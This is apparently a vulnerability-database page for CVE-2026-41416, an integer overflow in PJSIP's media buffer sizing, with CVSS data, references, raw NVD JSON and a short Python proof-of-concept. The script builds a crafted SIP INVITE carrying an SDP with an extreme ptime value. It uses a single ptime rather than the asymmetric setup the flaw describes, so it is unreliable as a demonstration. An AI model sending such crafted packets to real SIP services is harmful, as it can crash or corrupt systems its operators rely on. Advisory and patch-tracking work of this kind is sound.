Security Vulnerability Report
CVE-2026-41416 CVSS 7.5 HIGH

CVE-2026-41416

Published: 2026-04-24 19:17:13
Last Modified: 2026-04-28 18:30:20

Description

PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an integer overflow in the media stream buffer size calculation when processing SDP with asymmetric ptime configuration. The overflow may result in an undersized buffer allocation, which can lead to unexpected application termination or memory corruption. This vulnerability is fixed in 2.17.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:* - VULNERABLE
PJSIP <= 2.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket

# PoC for CVE-2026-41416: PJSIP Integer Overflow via Asymmetric ptime
# This script sends a crafted SIP INVITE with malicious SDP to trigger the buffer calculation overflow.

TARGET_IP = "127.0.0.1"
TARGET_PORT = 5060

# Crafted SDP with extreme ptime values to trigger integer overflow in buffer size calculation
# PJSIP calculates buffer size based on ptime. Asymmetric or large values cause the overflow.
malicious_sdp = f"""v=0
o=user 123 123 IN IP4 {TARGET_IP}
s=session
c=IN IP4 {TARGET_IP}
t=0 0
m=audio 12345 RTP/AVP 0
a=rtpmap:0 PCMU/8000
a=ptime:65535
"""

sip_request = f"""INVITE sip:test@{TARGET_IP} SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:5060;branch=z9hG4bK-overflow
Max-Forwards: 70
To: sip:test@{TARGET_IP}
From: sip:[email protected];tag=123
Call-ID: [email protected]
CSeq: 1 INVITE
Contact: sip:[email protected]
Content-Type: application/sdp
Content-Length: {len(malicious_sdp)}

{malicious_sdp}"""

print("Sending malicious SIP packet to PJSIP target...")

# Note: Actual network sending requires a running SIP server/client on the target.
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# sock.sendto(sip_request.encode(), (TARGET_IP, TARGET_PORT))
```

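References

https://github.com/pjsip/pjproject/commit/66fe416c96e957417621b7be16e9e587d159f9bb - Patch
https://github.com/pjsip/pjproject/security/advisories/GHSA-f33g-8hjq-62xr - Patch, Vendor Advisory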

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41416", "sourceIdentifier": "[email protected]", "published": "2026-04-24T19:17:13.327", "lastModified": "2026-04-28T18:30:20.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PJSIP is a free and open source multimedia communication library written in C. In 2.16 and earlier, there is an integer overflow in media stream buffer size calculation when processing SDP with asymmetric ptime configuration. The overflow may result in an undersized buffer allocation, which can lead to unexpected application termination or memory corruption This vulnerability is fixed in 2.17."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:teluu:pjsip:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17", "matchCriteriaId": "3CEC20D0-E450-41AD-BCF9-4E407594F2A7"}]}]}], "references": [{"url": "https://github.com/pjsip/pjproject/commit/66fe416c96e957417621b7be16e9e587d159f9bb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pjsip/pjproject/security/advisories/GHSA-f33g-8hjq-62xr", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}